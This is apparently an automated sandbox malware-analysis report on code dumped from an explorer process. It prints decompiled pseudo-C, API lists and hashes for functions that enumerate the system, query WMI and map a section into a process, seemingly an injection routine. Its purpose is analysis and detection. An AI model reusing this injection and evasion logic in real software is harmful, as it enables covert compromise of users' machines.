0x000ed37e
0x000ed380
0x000ed387
0x000ed387
0x000ed38d
0x000ed395
0x000ed39a
0x000ed39b
0x000ed3a0
0x000ed3a9
0x000ed3ab
0x000ed3b6
0x000ed3b6
0x000ed3bf
0x000ed3c7
0x000ed3ce
0x000ed3d3
0x000ed3e2
0x000ed3fa
0x000ed401
0x000ed40f
0x000ed421
0x000ed428
0x000ed435
0x00000000

APIs

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

GetCurrentProcessId.KERNEL32 ref: 000ED088
GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 000ED0C4
GetCurrentProcess.KERNEL32 ref: 000ED0E1
GetLastError.KERNEL32 ref: 000ED180
GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 000ED1AE
GetLastError.KERNEL32 ref: 000ED1B4
MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 000ED209
GetCurrentProcess.KERNEL32 ref: 000ED250
memset.MSVCRT ref: 000ED26B
GetVersionExA.KERNEL32(00000000), ref: 000ED276
GetCurrentProcess.KERNEL32(00000100), ref: 000ED290
GetSystemInfo.KERNEL32(?), ref: 000ED2AC
GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 000ED2C9

Strings

USERPROFILE, xrefs: 000ED326, 000ED354
TEMP, xrefs: 000ED335
%s\%s, xrefs: 000ED33B
SystemDrive, xrefs: 000ED395, 000ED3A0, 000ED3B5
TEMP, xrefs: 000ED36A, 000ED375, 000ED386

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 3876402152-2706916422
Opcode ID: 19662f81d482a532c3181f2648b967cf8f1239e2bae097c436d5c0fffc77611b
Instruction ID: e4b33128d1af534912b2a8f07afd44dcf3b1f270313588eee0964f084ddab486
Opcode Fuzzy Hash: 19662f81d482a532c3181f2648b967cf8f1239e2bae097c436d5c0fffc77611b
Instruction Fuzzy Hash: D4B16C71600748AFE710EB71DC89FEA77E8EF18300F00446AF65AD7592EB74AA44DB21

Uniqueness

Uniqueness Score: -1.00%

Function 000EDB7E, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E000EDB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E000ED565(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E000E85E5(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E000E85FB( &_v60, 0xfffffffe);
					E000ED619( &_v104);
					return _t320;
				}
				_t165 = E000E95C2(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E000E95C2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E000E92C6(_t165);
				_v60 = _t322;
				E000E85B6( &_v52);
				E000E85B6( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E000E95C2(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E000E85B6( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E000E85FB( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E000E91C4(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E000E91C4(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E000E8679(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E000E85E5( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E000E85FB(_t136, 0);
								E000E85FB( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E000E91C4(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E000E95C2(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E000E95C2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000E85E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E000E85B6( &_v92);
											E000E85B6( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E000E9621();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000E85E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000E95C2(_t283, 0x219);
										E000E9621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000E85B6( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000E91C4(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E000EDA62( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E000E85FB( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x000edb87
0x000edb8d
0x000edb94
0x000edb97
0x000edb9a
0x000edb9f
0x000edba1
0x000edba6
0x000edfee
0x000edfee
0x000edbb3
0x000edbb5
0x000edbb8
0x000edbbb
0x000edfd3
0x000edfd9
0x000edfe3
0x00000000
0x000edfe8
0x000edbc6
0x000edbcd
0x000edbd4
0x000edbd7
0x000edbdc
0x000edbde
0x000edbe1
0x000edbe4
0x000edbe5
0x000edbee
0x000edbf4
0x000edbf7
0x000edc00
0x000edc05
0x000edc0a
0x000edc21
0x000edc2e
0x000edc31
0x000edc38
0x000edc3d
0x000edc44
0x000edc49
0x000edc50
0x000edc52
0x000edc5e
0x000edc61
0x000edc63
0x000edfc3
0x000edfc4
0x000edfcd
0x00000000
0x000edfcd
0x000edc69
0x000edc6c
0x000edc6f
0x000edc72
0x000edc74
0x000edf8f
0x000edf92
0x000edf95
0x000edf97
0x000edfb9
0x000edfbe
0x000edf99
0x000edf9c
0x000edfa7
0x000edfae
0x000edfae
0x00000000
0x00000000
0x00000000
0x00000000
0x000edc7a
0x000edc7a
0x000edc8c
0x000edc8f
0x000edc91
0x00000000
0x00000000
0x000edc99
0x000edc9c
0x000edc9f
0x000edca2
0x000edca5
0x000edca8
0x00000000
0x00000000
0x000edcae
0x000edcbc
0x000edcbf
0x000edcc1
0x000edcda
0x000edce9
0x000edcf1
0x000edcf1
0x000edcf4
0x000edcfb
0x000edcff
0x000edd05
0x000edd07
0x000edf77
0x000edf7d
0x000edf83
0x000edf86
0x000edf86
0x00000000
0x000edf86
0x000edd16
0x000edd2a
0x000edd2e
0x000edd30
0x000edd35
0x000edf44
0x000edf4a
0x000edf55
0x000edf60
0x000edf66
0x000edf6c
0x000edf6f
0x00000000
0x000edf6f
0x000edd3b
0x000edf12
0x000edf12
0x000edf15
0x000edf18
0x00000000
0x00000000
0x000edd43
0x000edd4b
0x000edd52
0x000edd58
0x000edd5a
0x00000000
0x00000000
0x000edd63
0x000edd78
0x000edd7e
0x000edd87
0x000edd8a
0x000edd8d
0x000edd8f
0x000edf05
0x000edf08
0x000edf11
0x000edf11
0x00000000
0x000edf11
0x000edd9f
0x000edda2
0x000edda9
0x000eddaf
0x000eddb2
0x000eddb5
0x000eddb8
0x000eddbb
0x000eddf7
0x000eddf7
0x000eddfa
0x000edea6
0x000edeba
0x000edeca
0x000edece
0x000eded0
0x000edee7
0x000edeeb
0x000edef4
0x000edeff
0x00000000
0x000edeff
0x000eded6
0x000eded7
0x000ededc
0x000ededc
0x000edede
0x000ededf
0x000edee4
0x00000000
0x000edee4
0x000ede00
0x000ede00
0x000ede03
0x000ede6e
0x000ede82
0x000ede92
0x000ede96
0x000ede98
0x00000000
0x00000000
0x000ede9e
0x000ede9f
0x00000000
0x000ede9f
0x000ede05
0x000ede05
0x000ede08
0x00000000
0x00000000
0x000ede0a
0x000ede0d
0x00000000
0x00000000
0x000ede0f
0x000ede0f
0x000ede15
0x000ede31
0x000ede40
0x000ede49
0x000ede4e
0x000ede51
0x000ede57
0x000ede57
0x000ede5c
0x000ede68
0x00000000
0x000ede68
0x000ede1a
0x00000000
0x000ede1a
0x000eddbd
0x000edde4
0x000edde9
0x000eddee
0x000eddf0
0x000eddf0
0x00000000
0x000eddee
0x000eddbf
0x000eddbf
0x000eddc2
0x00000000
0x00000000
0x000eddc8
0x000eddc8
0x000eddcb
0x00000000
0x00000000
0x000eddd1
0x000eddd1
0x000eddd4
0x00000000
0x00000000
0x000eddda
0x000edddd
0x00000000
0x00000000
0x000edddf
0x00000000
0x000edddf
0x000edf21
0x000edf27
0x000edf2d
0x000edf30
0x000edf33
0x000edf33
0x000edf36
0x000edf37
0x000edf3a
0x000edf3c
0x00000000
0x00000000
0x000edf8c
0x000edf8c
0x00000000
0x000edf8c
0x000edcc3
0x000edcc9
0x00000000
0x000edcc9
0x000edf89
0x00000000
0x000edc0c
0x000edc11
0x000edc16
0x00000000
0x000edc1a

APIs

Part of subcall function 000ED565: CoInitializeEx.OLE32(00000000,00000000), ref: 000ED578
Part of subcall function 000ED565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000ED589
Part of subcall function 000ED565: CoCreateInstance.OLE32(000FB848,00000000,00000001,000FB858,?), ref: 000ED5A0
Part of subcall function 000ED565: SysAllocString.OLEAUT32(00000000), ref: 000ED5AB
Part of subcall function 000ED565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000ED5D6

Part of subcall function 000E85E5: RtlAllocateHeap.NTDLL(00000008,?,?,000E8F65,00000100,?,000E5FAC), ref: 000E85F3

SysAllocString.OLEAUT32(00000000), ref: 000EDC27
SysAllocString.OLEAUT32(00000000), ref: 000EDC3B
SysFreeString.OLEAUT32(?), ref: 000EDFC4
SysFreeString.OLEAUT32(?), ref: 000EDFCD

Part of subcall function 000E85FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000E8641

Strings

FALSE, xrefs: 000EDDF0
TRUE, xrefs: 000EDDE9

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: c308911b0e5104c29ee08b0703fcaf3cbd9972e6468cb7c632aef34f11c58b9f
Instruction ID: 753d1f41e6a5d043a41695e9e6565c9362608e791b9c0fb0afb50d606b321352
Opcode Fuzzy Hash: c308911b0e5104c29ee08b0703fcaf3cbd9972e6468cb7c632aef34f11c58b9f
Instruction Fuzzy Hash: FFE14071A00659AFDB14EFE5C889EEEBBB5FF48300F10855AE506BB291DB31A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000EC702, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200
registryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E000EC702(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xfe688; // 0x80000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E000EE280(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xfe780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xfe780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xfe780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xfe780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xfe780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xfe780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E000E864A( *0xfe688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xfe684; // 0x25bf8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xfe684; // 0x25bf8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E000E85FB( &_v32, 0x1ac4);
					_t141 =  *0xfe688; // 0x80000
					 *0xfe688 = _t131;
					E000E86C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E000EC681(_v12, _v8, _v36);
					 *0xfe688 = _t141;
					goto L14;
				}
			}

0x000ec708
0x000ec70f
0x000ec711
0x000ec713
0x000ec715
0x000ec718
0x000ec71b
0x000ec71e
0x000ec721
0x000ec724
0x000ec727
0x000ec731
0x000ec734
0x000ec73b
0x000ec740
0x000ec740
0x000ec746
0x000ec748
0x000ec751
0x000ec8f7
0x000ec8fb
0x000ec900
0x000ec906
0x000ec909
0x000ec909
0x000ec90d
0x000ec912
0x000ec917
0x000ec924
0x000ec924
0x000ec92d
0x000ec92f
0x000ec937
0x000ec937
0x000ec93e
0x000ec93e
0x000ec75a
0x000ec75b
0x000ec760
0x000ec766
0x000ec768
0x000ec769
0x000ec76a
0x000ec76f
0x000ec770
0x000ec77a
0x00000000
0x00000000
0x000ec785
0x000ec78f
0x000ec799
0x000ec79c
0x000ec7a2
0x000ec7a9
0x000ec7aa
0x000ec7ab
0x000ec7b4
0x000ec7b5
0x000ec7b6
0x000ec7b8
0x000ec7bb
0x000ec7be
0x000ec7c1
0x000ec7c4
0x000ec7d0
0x000ec7f2
0x000ec7fa
0x000ec7fd
0x000ec808
0x000ec808
0x000ec7fa
0x000ec80e
0x000ec817
0x000ec819
0x000ec81a
0x000ec81c
0x000ec81d
0x000ec81e
0x000ec81f
0x000ec823
0x000ec82a
0x000ec82b
0x000ec833
0x000ec8f4
0x00000000
0x000ec839
0x000ec839
0x000ec83b
0x000ec83c
0x000ec841
0x000ec842
0x000ec843
0x000ec844
0x000ec845
0x000ec84b
0x000ec84c
0x000ec851
0x000ec852
0x000ec85a
0x00000000
0x00000000
0x000ec870
0x000ec872
0x000ec879
0x00000000
0x00000000
0x000ec88a
0x000ec890
0x000ec898
0x000ec89b
0x000ec8a1
0x000ec8b1
0x000ec8bd
0x000ec8c2
0x000ec8c8
0x000ec8d8
0x000ec8e4
0x000ec8ec
0x00000000
0x000ec8ec

APIs

RegisterClassExA.USER32 ref: 000EC7C7
CreateWindowExA.USER32 ref: 000EC7F2
DestroyWindow.USER32 ref: 000EC7FD
UnregisterClassA.USER32(?,00000000), ref: 000EC808
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000EC824
GetCurrentProcess.KERNEL32(00000000), ref: 000EC91D

Part of subcall function 000E85FB: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000E8641

Strings

sadccdcdsasa, xrefs: 000EC780
0, xrefs: 000EC78F
cdcdwqwqwq, xrefs: 000EC7AC

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
String ID: 0$cdcdwqwqwq$sadccdcdsasa
API String ID: 3082384575-2319545179
Opcode ID: a018aef812cb513ae8a0f9680fbb5dc2917ed25bd6534f5b478b62a8a9b7cd2e
Instruction ID: ce1911019ac40e28f4350a504aa5a62fe2ed36d705160bf756ac75c09742c22a
Opcode Fuzzy Hash: a018aef812cb513ae8a0f9680fbb5dc2917ed25bd6534f5b478b62a8a9b7cd2e
Instruction Fuzzy Hash: 00715D71A00288AFEB10DF95DD49EEEBBB9FF49700F204059F605B7290CB75AA01DB54

Uniqueness

Uniqueness Score: -1.00%

Function 000E5F63, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000E85D0();
				_t19 = E000E97ED( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E000E8F59();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0xfe69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000E95A8(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000E85A3( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E000F2A93( *0xfe69c);
						 *_t55 = 0x7c3;
						 *0xfe684 = E000EE1FE(0xfba20, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000E95C2(0xfba20);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000E85B6();
							_v8 = 0;
							_t37 =  *0xfe684; // 0x25bf8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000E5DE7, 0, 0,  &_v8);
							 *0xfe6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000E85B6();
					}
					goto L10;
				}
			}

0x000e5f63
0x000e5f73
0x000e5f7d
0x000e60b1
0x000e60a4
0x00000000
0x000e60a6
0x000e60b8
0x000e6079
0x00000000
0x000e6079
0x000e5f83
0x000e5f8b
0x000e5f92
0x000e5f94
0x00000000
0x000e5fa7
0x000e5fa7
0x000e5fad
0x000e5fb3
0x000e5fc3
0x000e5fc8
0x000e5fd0
0x000e5fd8
0x000e5ff4
0x000e5ff9
0x000e5ffc
0x000e5ffe
0x000e6000
0x000e600d
0x000e6016
0x000e601f
0x000e6024
0x000e6025
0x000e6033
0x000e603d
0x000e604e
0x000e6053
0x000e605a
0x000e6061
0x000e6064
0x000e6070
0x000e6071
0x000e607d
0x000e6086
0x000e608a
0x000e6098
0x000e609b
0x000e60a2
0x00000000
0x00000000
0x00000000
0x000e60a2
0x000e6073
0x000e6078
0x00000000
0x000e5fd8

APIs

OutputDebugStringA.KERNEL32(Hello qqq), ref: 000E5F73
SetLastError.KERNEL32(000000AA), ref: 000E60B8

Part of subcall function 000E85D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,000E5F88), ref: 000E85D9

Part of subcall function 000E97ED: GetSystemTimeAsFileTime.KERNEL32(?,?,000E5F90), ref: 000E97FA
Part of subcall function 000E97ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000E981A

GetModuleHandleA.KERNEL32(00000000), ref: 000E5FAD
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000E5FC8
GetLastError.KERNEL32 ref: 000E5FD0
memset.MSVCRT ref: 000E5FF4
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000E6016
GetFileAttributesW.KERNEL32(00000000), ref: 000E6064

Strings

Hello qqq, xrefs: 000E5F6E

Memory Dump Source

Source File: 00000009.00000002.906703368.00000000000E0000.00000040.00020000.sdmp, Offset: 000E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e0000_explorer.jbxd

Yara matches

Similarity

API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
String ID: Hello qqq
API String ID: 1203100507-3610097158
Opcode ID: 7e053188ef460b70f391a53a64f8ed8ad9ea5b3b3dd75acb91093e1ee58948e5
Instruction ID: d4161aad4855d2947fe6e0395405c00c48508b93d7acd14de73e6ada0a165e1a
Opcode Fuzzy Hash: 7e053188ef460b70f391a53a64f8ed8ad9ea5b3b3dd75acb91093e1ee58948e5
